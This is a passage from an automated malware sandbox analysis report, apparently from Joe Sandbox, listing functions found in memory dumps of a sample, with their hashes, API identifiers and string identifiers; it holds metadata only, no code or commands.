                                                                                                                                                                                                                                                  • Instruction ID: 2b0c48336ee1d22f0f7d88f21b07dc06d84e293d75f40a6eefdf872499573026
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22b6baa0136d7a81fdec22cf7cdda1a2de21252ce0cf2c52ffb701361c825a6f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9B01291C2F150CBC1811F140C3027DB73C5743932F043F54403C330E1D0208400E20D
                                                                                                                                                                                                                                                  Function 0076559D Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                  • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                                  Function 0077C79B Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                  • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                  Function 00771337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                  • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                  • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                  • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                  • Instruction ID: 2f9e8cac9a16cb34d7c15275219c7ccdc19f21df199ac843fabf6d546fa13de3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5417E7150C7818ED301EF7C988835EBEE09B86314F498A7DE8E986392D7788548D793
                                                                                                                                                                                                                                                  Function 0076FAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                  • String ID: L
                                                                                                                                                                                                                                                  • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                  • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                  • Instruction ID: 7bde534f6bc93d64c03f2d1c6a7180320311d6bc8027802423da990de65230bd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37412B7110CBC18ED321DB38845865EBFD16BE6220F188A9CE5F5873E2D6748549CB53
                                                                                                                                                                                                                                                  Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                  • String ID: L
                                                                                                                                                                                                                                                  • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                  • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                  • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                                  Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                  • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                  • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86